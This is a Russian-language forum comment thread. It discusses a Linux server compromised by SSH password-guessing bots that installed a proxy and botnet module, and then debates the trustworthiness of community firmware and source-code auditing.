Исходя из исходных данных удалось установить, что прокси боты сканят ssh и попутно подбирают пароли. Поскольку у юного дарования оказался логин user, а пароль «fack_off», то на сервер попал бот. Судя по забекапенным логам, или того, что попало в логи, бот просканировал запущенные сервисы и, если находил apache, то цеплял на него прокси сервер, а потом подгружал сам модуль ботнета от дядюшки Билли."
Легко заметить, что линукс от тупой прокладки между креслом и клавиатурой машину не спас:) А времена когда пользователи линукса в основной массе были квалифицированнее виндовых уже давно прошли.
Texnoline
8 ноября, 2015 - 19:15
5 звезд, уважаю человека читающего Хабр!
:)
но если уж покопаться в прошивке роутера (выбрать для начала правильное железо...), или поставить прошивку от энтузиастов, как я сделал со своими девайсами: от роутеров WiFi — до смартфонов на Android (перелопатил за 17,5 часов две сервисных прошивки 4.4.4 и 5.02 недавно и повыкидывал из них все, что "сливает" Google, затем забэкапил все это — в трех местах, на случай ядерной войны)! Что мне не мешало, так сделать: лень или узость мышления, или еще чего-нить там...?
Чингачгук
8 ноября, 2015 - 19:28
А где гарантия что прошивка от энтузиастов в бинарном виде будет чистая? По уму — надо брать дерево исходников и проверять строчку за строчкой, а потом самому же и собирать, поскольку исходники на сайте могут лежать одни, а на сборку пойти совсем другие:) Чисто навскидку заглянул сейчас на Github, качнул оттуда android_device_motorola_msm8226-common-cm-11.0. 44 папки, 241 файл, общий вес содержимого чуть меньше 2 с половиной мегов — и это только небольшая часть всего проекта, написанная минимум на трёх языках программирования (не считая make:). Потом неплохо бы не только ось, но и входящий в комплект софт аналогично проверить. А когда жить-то?
Texnoline
8 ноября, 2015 - 19:54
исходники пакетов я смотрю только сигнатурно и конечно не своими глазами, а через анализаторы "на отдельной ферме", что критично (модули отдельные и т.д. и то, что я знаю лично) — изучаю путем тотального дизассамблера, который у меня даже на Pebble имеется в рабочей версии его прошивки... конечно — это не гарантия 100%, но лучше чем или ничего, или использование коммерческих, копирастных продуктов!
:)
Чингачгук
8 ноября, 2015 - 20:28
Под линукс я давненько ничего не писал, но насколько помню — там с этим было не лучше чем со всем остальным. И если сорцы можно даже в nano набивать, а компилить и собирать со всякими gcc и make, то с отладкой и дизассемлированием было всё плохо: gdb в смеси с ldb, strings и прочими readelf — это процентов 10 от функционала и возможности IDA Pro. Который под линуксом тоже есть — но не бесплатный и не open source, а потому жадные дети скачут по форумам и торрентам в поисках крака либо ломаной версии не хуже виндузовых:) Как скакали за тем же NeroLinux и платными линуксами, будь то Mandriva Powerpack, Corel Linux Deluxe и прочими Lindows.
dk
8 ноября, 2015 - 15:25
Ну а в чем тогда ценность данного вируса как такового? Разве что некоторая автоматизация процесса.
Комментировать